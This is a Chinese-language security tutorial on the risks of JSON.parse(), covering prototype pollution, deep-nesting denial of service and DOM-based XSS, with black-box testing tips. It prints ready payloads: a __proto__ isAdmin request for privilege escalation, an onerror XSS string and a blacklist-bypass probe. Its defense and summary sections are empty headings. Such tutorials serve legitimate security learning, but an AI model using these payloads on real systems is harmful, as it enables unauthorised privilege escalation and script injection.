一段簡單的 JSON 解析代碼，可能是一次嚴重的原型污染、提權繞過、服務癱瘓的開始。本文深入解析 JSON.parse() 的安全風險、攻擊方式，并講解如何在黑盒測試中通過數據包行為反推出后臺邏輯，為你打開攻防對抗中的新視角。

一、JSON.parse 是什么？它本身安全嗎？

JSON.parse() 是 JavaScript 原生函數，用于將字符串解析為 JavaScript 對象：

const obj = JSON.parse('{"user":"admin"}');

它本身不會執行代碼、不會像 Java 反序列化一樣觸發遠程類加載或代碼執行。

但它存在安全隱患的傳播點，關鍵在于：你如何使用解析后的對象！

二、安全風險與利用場景

風險一：原型鏈污染（Prototype Pollution）

關鍵字段如 __proto__ / constructor / prototype 被寫入對象中，通過合并操作傳播到所有對象。

利用前提：

• 后端用 Object.assign、lodash.merge 等合并用戶傳參與默認配置。
• 沒有進行關鍵字段過濾。

典型 payload：

{
"__proto__": {
"admin": true
  }
}

后果示例：

const config = Object.assign({}, defaultConfig, JSON.parse(userInput));
// 之后任何 new Object() 都可能帶上 admin: true

常見數據包格式：

POST /api/profile HTTP/1.1
Host: target.example.com
Content-Type: application/json
Content-Length: 70

{
  "__proto__": {
    "isAdmin": true
  }
}

Burp 分析方法：

如果行為生效，將獲得Admin權限，頁面菜單等權限將有明顯改變。

風險二：拒絕服務攻擊（Billion Laughs / Deep Nesting DoS）

{
"a":{"a":{"a":{"a":{"a":{"a":{"a":{"a":{"a":{"a":{}}}}}}}}}}
}

• 重復嵌套結構觸發 CPU 暴漲或內存崩潰。
• 常用于前期探測、WAF 繞過測試。

風險三：DOM-Based XSS（前端使用不當）

如果前端用 innerHTML 或 document.write 直接渲染 JSON 解析的字段：

const data = JSON.parse(payload);
document.body.innerHTML = data.content;

攻擊者構造：

{"content": "<img src=x onerror=alert(1)>"}

三、數據包特征分析

我們如何**在黑盒測試中識別系統內部使用了 JSON.parse()**？以下是典型思路：

特征：API 接收 JSON 格式 body

POST /api/config HTTP/1.1
Content-Type: application/json

{"username":"admin"}

判斷方式分析：

組合測試：

• 提交 __proto__ → 檢查是否持久化
• 提交 constructor.prototype.polluted = true → 檢查全局污染跡象
• 利用 ["__proto__"] 數組索引寫入，繞過某些黑名單
• 使用深嵌套 JSON → 檢測解析限制

四、防御建議

五、總結